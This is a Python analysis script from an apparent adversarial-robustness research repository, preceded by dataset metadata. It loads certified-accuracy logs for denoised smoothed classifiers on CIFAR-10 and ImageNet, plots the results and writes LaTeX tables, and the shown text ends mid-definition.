| 14.666667 | 28 | 0.772727 | 6 | 44 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159091 | 44 | 2 | 29 | 22 | 0.918919 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b9988fa2014c98f763946b6fcdbe1fdd56978ea6 | 59,055 | py | Python | analyze.py | damon-demon/Black-Box-Defense | d810a694862e83b899ef6207713b2a8071c79c04 | [
"MIT"
] | 2 | 2022-02-26T22:14:01.000Z | 2022-03-04T20:46:27.000Z | analyze.py | OTML-Group/Black-Box-Defense | b4e1b9e6e1703a8d1ba7535d531647abb9705fe9 | [
"MIT"
] | null | null | null | analyze.py | OTML-Group/Black-Box-Defense | b4e1b9e6e1703a8d1ba7535d531647abb9705fe9 | [
"MIT"
] | 1 | 2022-03-15T00:10:33.000Z | 2022-03-15T00:10:33.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from easydict import EasyDict as edict
from typing import *
import math
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
import seaborn as sns
sns.set()
class Accuracy(object):
def at_radii(self, radii: np.ndarray):
raise NotImplementedError()
class ApproximateAccuracy(Accuracy):
def __init__(self, data_file_path: str):
self.data_file_path = data_file_path
def at_radii(self, radii: np.ndarray) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return np.array([self.at_radius(df, radius) for radius in radii])
def at_radius(self, df: pd.DataFrame, radius: float):
return (df["correct"] & (df["radius"] >= radius)).mean()
def get_abstention_rate(self) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return 1.*(df["predict"]==-1).sum()/len(df["predict"])*100
class ApproximateAccuracy_API(Accuracy):
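    # API certification logs are written without a header row, so the frame
    # is read with header=None and addressed positionally: column 1 holds the
    # correctness flag and column 2 the certified radius.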
def __init__(self, data_file_path: str):
self.data_file_path = data_file_path
def at_radii(self, radii: np.ndarray) -> np.ndarray:
df = pd.read_csv(self.data_file_path, header=None, delimiter="\t")
return np.array([self.at_radius(df, radius) for radius in radii])
def at_radius(self, df: pd.DataFrame, radius: float):
return (df[df.columns[1]] & (df[df.columns[2]] >= radius)).mean()
def get_abstention_rate(self) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return 1.*(df[df.columns[-1]]==-1).sum()/len(df[df.columns[-1]])*100
class Line(object):
def __init__(self, quantity: Accuracy, legend: str = None, plot_fmt: str = "", scale_x: float = 1, alpha: float = 1):
self.quantity = quantity
self.legend = legend
self.plot_fmt = plot_fmt
self.scale_x = scale_x
self.alpha = alpha
def plot_certified_accuracy_per_sigma_against_baseline(outfile: str, title: str, max_radius: float,
methods: List[Line]=None, label='Ours', methods_base: List[Line]=None, label_base='Baseline', radius_step: float = 0.01, upper_bounds=False) -> None:
color = ['b', 'orange', 'g', 'r']
sigmas = [0.12, 0.25, 0.5, 1.00]
if "api" in outfile:
sigmas = [0.12, 0.25]
for it, sigma in enumerate(sigmas):
methods_sigma = [method for method in methods if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_sigma, 0, max_radius, radius_step)
plt.plot(radii, accuracies_cert_ours.max(0), color[it], label='{}|$\sigma = {:.2f}$'.format(label, sigma))
for it, line in enumerate(methods_base):
plt.plot(radii * line.scale_x, line.quantity.at_radii(radii), color[it], dashes=[2, 2], alpha=line.alpha, label='{}|'.format(label_base)+line.legend)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("$\ell_2$ radius", fontsize=16)
plt.ylabel("Certified Accuracy", fontsize=16)
if "api" not in outfile:
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(0.5))
plt.legend(loc='upper right', fontsize=16)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
def plot_certified_accuracy_per_sigma_against_baseline_finetune(outfile: str, title: str, max_radius: float,
methods: List[Line]=None, label='Ours', methods_finetune=None, label_finetune="Finetune", methods_base: List[Line]=None, label_base='Baseline', radius_step: float = 0.01, upper_bounds=False) -> None:
color = ['b', 'orange', 'g', 'r']
sigmas = [0.12, 0.25, 0.5, 1.00]
if "api" in outfile:
sigmas = [0.25]
for it, sigma in enumerate(sigmas):
methods_eps = [method for method in methods_finetune if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_eps, 0, max_radius, radius_step)
plt.plot(radii, accuracies_cert_ours.max(0), color[3], label='{}|$\sigma = {:.2f}$'.format(label_finetune, sigma))
for it, sigma in enumerate(sigmas):
methods_eps = [method for method in methods if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_eps, 0, max_radius, radius_step)
plt.plot(radii, accuracies_cert_ours.max(0), color[0], label='{}|$\sigma = {:.2f}$'.format(label, sigma))
for it, line in enumerate(methods_base):
if "0.25" not in line.quantity.data_file_path:
continue
plt.plot(radii * line.scale_x, line.quantity.at_radii(radii), color[1], alpha=line.alpha, label='{}|'.format(label_base)+line.legend)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("$\ell_2$ radius", fontsize=16)
plt.ylabel("Certified Accuracy", fontsize=16)
if "api" not in outfile:
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(0.5))
plt.legend(loc='upper right', fontsize=16)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
def plot_certified_accuracy_per_sigma_best_model(outfile: str, title: str, max_radius: float,
methods: List[Line]=None, label='Ours', methods_base: List[Line]=None, label_base='Baseline', radius_step: float = 0.01, upper_bounds=False, sigmas=[0.25]) -> None:
color = ['b', 'orange', 'g', 'r']
for it, sigma in enumerate(sigmas):
methods_sigma = [method for method in methods if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_sigma, 0, max_radius, radius_step)
        # use the nan= keyword (NumPy >= 1.17); a bare positional -1 would be
        # taken as the copy flag and leave NaNs mapped to 0
        accuracies_cert_ours = np.nan_to_num(accuracies_cert_ours, nan=-1)
plt.plot(radii, accuracies_cert_ours[accuracies_cert_ours[:,0].argmax(), :], color[it], label='{}|$\sigma = {:.2f}$'.format(label, sigma))
for it, sigma in enumerate(sigmas):
methods_sigma_base = [method for method in methods_base if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_sigma_base, 0, max_radius, radius_step)
        accuracies_cert_ours = np.nan_to_num(accuracies_cert_ours, nan=-1)
plt.plot(radii, accuracies_cert_ours[accuracies_cert_ours[:,0].argmax(), :], color[it], dashes=[2, 2], label='{}|$\sigma = {:.2f}$'.format(label_base, sigma))
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("$\ell_2$ radius", fontsize=16)
plt.ylabel("Certified Accuracy", fontsize=16)
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(0.5))
plt.legend(loc='upper right', fontsize=16)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
def plot_certified_accuracy_one_sigma_best_model_multiple_methods(outfile: str, title: str, max_radius: float,
methods_labels_colors_dashes: List,
radius_step: float = 0.01, upper_bounds=False, sigma=0.25) -> None:
for it, (methods, label, color, dashes) in enumerate(methods_labels_colors_dashes):
methods_sigma = [method for method in methods if '{:.2f}'.format(sigma) in method.quantity.data_file_path]
accuracies_cert_ours, radii = _get_accuracies_at_radii(methods_sigma, 0, max_radius, radius_step)
        accuracies_cert_ours = np.nan_to_num(accuracies_cert_ours, nan=-1)
plt.plot(radii, accuracies_cert_ours[accuracies_cert_ours[:,0].argmax(), :],
color, dashes=dashes, linewidth=2, label=label)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("$\ell_2$ radius", fontsize=16)
plt.ylabel("Certified Accuracy", fontsize=16)
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(0.5))
plt.legend(loc='upper right', fontsize=16)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
def latex_table_certified_accuracy_upper_envelope(outfile: str, radius_start: float, radius_stop: float, radius_step: float,
methods: List[Line]=None, clean_accuracy=True):
accuracies, radii = _get_accuracies_at_radii(methods, radius_start, radius_stop, radius_step)
clean_accuracies, _ = _get_accuracies_at_radii(methods, 0, 0, 0.25)
assert clean_accuracies.shape[1] == 1
f = open(outfile, 'w')
f.write("$\ell_2$ Radius")
for radius in radii:
f.write("& ${:.3}$".format(radius))
f.write("\\\\\n")
f.write("\midrule\n")
    clean_accuracies = np.nan_to_num(clean_accuracies, nan=-1)
    accuracies = np.nan_to_num(accuracies, nan=-1)
for j, radius in enumerate(radii):
argmaxs = np.argwhere(accuracies[:,j] == accuracies[:, j].max())
argmaxs = argmaxs.flatten()
i = argmaxs[clean_accuracies[argmaxs, 0].argmax()]
# i = i.flatten()[0]
if clean_accuracy:
txt = " & $^{("+"{:.2f})".format(clean_accuracies[i, 0]) + "}" + "${:.2f}".format(accuracies[i, j])
else:
txt = " & {:.2f}".format(accuracies[i, j])
f.write(txt)
f.write("\\\\\n")
f.close()
def _get_accuracies_at_radii(methods: List[Line], radius_start: float, radius_stop: float, radius_step: float):
radii = np.arange(radius_start, radius_stop + radius_step, radius_step)
accuracies = np.zeros((len(methods), len(radii)))
for i, method in enumerate(methods):
accuracies[i, :] = method.quantity.at_radii(radii)
return accuracies, radii
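# A worked micro-example of the certified-accuracy rule used in at_radius
# (hypothetical data, for illustration only): a sample counts at radius r iff
# it is correctly classified AND certified at a radius >= r.
#
#     df = pd.DataFrame({"correct": [1, 1, 0], "radius": [0.50, 0.10, 0.90]})
#     (df["correct"] & (df["radius"] >= 0.25)).mean()   # -> 1/3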
if __name__ == "__main__":
if not os.path.isdir("analysis/plots/cifar10/full_access"):
os.makedirs("analysis/plots/cifar10/full_access")
if not os.path.isdir("analysis/plots/cifar10/query_access"):
os.makedirs("analysis/plots/cifar10/query_access")
if not os.path.isdir("analysis/plots/imagenet/full_access"):
os.makedirs("analysis/plots/imagenet/full_access")
if not os.path.isdir("analysis/plots/imagenet/query_access"):
os.makedirs("analysis/plots/imagenet/query_access")
if not os.path.isdir("analysis/plots/vision_api/azure/"):
os.makedirs("analysis/plots/vision_api/azure/")
if not os.path.isdir("analysis/plots/vision_api/google/"):
os.makedirs("analysis/plots/vision_api/google/")
if not os.path.isdir("analysis/plots/vision_api/aws/"):
os.makedirs("analysis/plots/vision_api/aws/")
if not os.path.isdir("analysis/plots/vision_api/clarifai/"):
os.makedirs("analysis/plots/vision_api/clarifai/")
if not os.path.isdir("analysis/latex/"):
os.makedirs("analysis/latex/")
################### PLOTS
# Paper plots
all_cifar_cohen_N10000=[
Line(ApproximateAccuracy("data/certify/cifar10/no_denoiser/MODEL_resnet110_90epochs/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
cifar_no_denoiser_N10000 = [
Line(ApproximateAccuracy("data/certify/cifar10/no_denoiser/MODEL_resnet110_90epochs/noise_0.00/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
cifar_denoiser_cifar10_dncnn_epochs_90_N10000 = [
Line(ApproximateAccuracy("data/certify/cifar10/mse_obj/MODEL_resnet110_90epochs_DENOISER_cifar10_dncnn_epochs_90/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
cifar_denoiser_cifar10_dncnn_wide_epochs_90_N10000 = [
Line(ApproximateAccuracy("data/certify/cifar10/mse_obj/MODEL_resnet110_90epochs_DENOISER_cifar10_dncnn_wide_epochs_90/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
cifar_denoiser_cifar10_memnet_epochs_90_N10000 = [
Line(ApproximateAccuracy("data/certify/cifar10/mse_obj/MODEL_resnet110_90epochs_DENOISER_cifar10_memnet_epochs_90/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
all_cifar_denoising_obj_denoisers = cifar_denoiser_cifar10_dncnn_epochs_90_N10000 + \
cifar_denoiser_cifar10_dncnn_wide_epochs_90_N10000 + \
cifar_denoiser_cifar10_memnet_epochs_90_N10000
### Full-Access Cifar10
denoiser_networks = ['dncnn', 'dncnn_wide', 'memnet']
all_exp_resnet110_fullAccess_cifar10_classification = [
Line(ApproximateAccuracy("data/certify/cifar10/clf_obj/{0}_resnet110_90epochs_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
            # each of these corresponds to a hyperparameter setting (see the appendix in the paper for details)
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_1',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_2',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_3',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_4',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_5',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_fullAccess_cifar10_stability = [
Line(ApproximateAccuracy("data/certify/cifar10/stab_obj/{0}_resnet110_90epochs_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
            # each of these corresponds to a hyperparameter setting (see the appendix in the paper for details)
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_1',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_2',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_3',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_4',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_5',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_fullAccess_cifar10_stability_finetune = [
Line(ApproximateAccuracy("data/certify/cifar10/stab+mse_obj/{0}_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-4_20epochs_renset110_90epochs',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-5_20epochs_renset110_90epochs',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-4_20epochs_renset110_90epochs',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-5_20epochs_renset110_90epochs',
]
for denoiser in denoiser_networks
]
# Plot best models
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/full_access/resnet110_90epochs_all_methods_sigma_12", 'Query-access Cifar10-ResNet110', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_fullAccess_cifar10_stability, 'Stab', 'g', [6, 2]),
(all_exp_resnet110_fullAccess_cifar10_stability_finetune, 'Stab+MSE', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.12)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/full_access/resnet110_90epochs_all_methods_sigma_25", 'Query-access Cifar10-ResNet110', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_fullAccess_cifar10_stability, 'Stab', 'g', [6, 2]),
(all_exp_resnet110_fullAccess_cifar10_stability_finetune, 'Stab+MSE', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.25)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/full_access/resnet110_90epochs_all_methods_sigma_50", 'Query-access Cifar10-ResNet110', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_fullAccess_cifar10_stability, 'Stab', 'g', [6, 2]),
(all_exp_resnet110_fullAccess_cifar10_stability_finetune, 'Stab+MSE', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.50)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/full_access/resnet110_90epochs_all_methods_sigma_100", 'Query-access Cifar10-ResNet110', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_fullAccess_cifar10_stability, 'Stab', 'g', [6, 2]),
(all_exp_resnet110_fullAccess_cifar10_stability_finetune, 'Stab+MSE', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=1.00)
plot_certified_accuracy_per_sigma_best_model(
"analysis/plots/cifar10/full_access/resnet110_90epochs_stab_vs_clf", 'Stability vs. Classification', 2.25,
methods=all_exp_resnet110_fullAccess_cifar10_stability, label='Stab',
methods_base=all_exp_resnet110_fullAccess_cifar10_classification, label_base='Clf',
sigmas=[0.12, 0.25, 0.5, 1.0])
#######################################################################################
### Query-Access Cifar10
denoiser_networks = ['dncnn', 'dncnn_wide', 'memnet']
all_exp_resnet110_queryAccess_cifar10_classification = [
Line(ApproximateAccuracy("data/certify/cifar10/clf_obj/{0}_multi_classifiers_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
            # each of these corresponds to a hyperparameter setting (see the appendix in the paper for details)
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_1',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_2',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_3',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_4',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_5',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_6',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_queryAccess_cifar10_stability = [
Line(ApproximateAccuracy("data/certify/cifar10/stab_obj/{0}_multi_classifiers_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
            # each of these corresponds to a hyperparameter setting (see the appendix in the paper for details)
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_1',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_2',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_3',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_4',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_5',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_6',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_queryAccess_cifar10_stability_1surrogate = [
Line(ApproximateAccuracy("data/certify/cifar10/stab_obj/MODEL_ResNet110_DENOISER_surrogate_resnet110/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
]
all_exp_resnet110_queryAccess_cifar10_stability_finetune_1surrogate = [
Line(ApproximateAccuracy("data/certify/cifar10/stab+mse_obj/{0}_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-4_20epochs_WRN',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-5_20epochs_WRN',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-4_20epochs_WRN',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-5_20epochs_WRN',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate = [
Line(ApproximateAccuracy("data/certify/cifar10/stab+mse_obj/{0}_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-4_20epochs_multi_classifiers',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-5_20epochs_multi_classifiers',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-4_20epochs_multi_classifiers',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-5_20epochs_multi_classifiers',
]
for denoiser in denoiser_networks
]
# Plot best models
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_12", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.12)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_25", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.25)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_50", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.50)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_100", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=1.00)
plot_certified_accuracy_per_sigma_best_model(
"analysis/plots/cifar10/query_access/resnet110_90epochs_stab_vs_clf", 'finetune_cifar_best_models', 2.25,
methods=all_exp_resnet110_queryAccess_cifar10_stability, label='Stab',
methods_base=all_exp_resnet110_queryAccess_cifar10_classification, label_base='Clf',
sigmas=[0.12, 0.25, 0.5, 1.0])
## 1 Surrogate
for sigma in [0.12, 0.25, 0.50, 1.00]:
    plot_certified_accuracy_one_sigma_best_model_multiple_methods(
        "analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_{:.0f}_1surrogate_vs_14".format(sigma * 100),
        'blackbox_cifar_best_models', 1.0,
        methods_labels_colors_dashes=[
            (all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
            (all_exp_resnet110_queryAccess_cifar10_stability_1surrogate, 'Stab 1-Surrogate', 'b', [2, 4]),
            (all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
            (all_exp_resnet110_queryAccess_cifar10_stability_finetune_1surrogate, 'Stab+MSE 1-Surrogate', 'k', [5, 1]),
        ],
        sigma=sigma)
##############################################################################################################
##############################################################################################################
##############################################################################################################
##############################################################################################################
#################################################################################################################
# ImageNet results
imagenet_archs = ['resnet18', 'resnet34', 'resnet50']
imagenet_results = edict()
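# imagenet_results is a nested edict: imagenet_results[arch].<experiment> holds a
# list of Line objects (one per noise level sigma), each wrapping the certification
# log for that classifier/denoiser combination; edict allows attribute-style access.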
for arch in imagenet_archs:
    imagenet_results[arch] = edict()
    imagenet_results[arch].imagenet_no_denoiser_N10000 = [
        Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}/noise_0.00/test_N10000/sigma_{1:.2f}".format(arch, noise)), r"$\sigma = {0:.2f}$".format(noise))
        for noise in [0.12, 0.25, 0.5, 1.0]
    ]
    imagenet_results[arch].imagenet_denoiser_dncnn_off_the_shelf_N10000 = [
        Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_dncnn-off-the-shelf/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise)), r"$\sigma = {0:.2f}$".format(noise))
        for noise in [0.12, 0.25, 0.5, 1.0]
    ]
    imagenet_results[arch].imagenet_denoiser_imagenet_dncnn_5epoch_lr1e_4_N10000 = [
        Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_imagenet_dncnn_5epoch_lr1e-4/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise)), r"$\sigma = {0:.2f}$".format(noise))
        for noise in [0.12, 0.25, 0.5, 1.0]
    ]
    # The MSE aggregate keeps only the retrained DnCNN; the off-the-shelf
    # variant (imagenet_denoiser_dncnn_off_the_shelf_N10000) is excluded.
    imagenet_results[arch].all_imagenet_denoising_obj_denoisers = imagenet_results[arch].imagenet_denoiser_imagenet_dncnn_5epoch_lr1e_4_N10000
    ## Classification- and stability-objective denoisers, keyed by the surrogate they were trained against
    imagenet_results[arch].all_imagenet_classification_obj_N10000 = {}
    imagenet_results[arch].all_imagenet_stability_obj_N10000 = {}
    for surrogate in imagenet_archs:
        imagenet_results[arch].all_imagenet_classification_obj_N10000[surrogate] = [
            Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_{2}/{3}/dncnn/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise, denoiser, surrogate)), r"$\sigma = {0:.2f}$".format(noise))
            for noise in [0.12, 0.25, 0.5, 1.0]
            for denoiser in ['imagenet_classification_obj_adam_1e-5_20epochs']
        ]
        imagenet_results[arch].all_imagenet_stability_obj_N10000[surrogate] = [
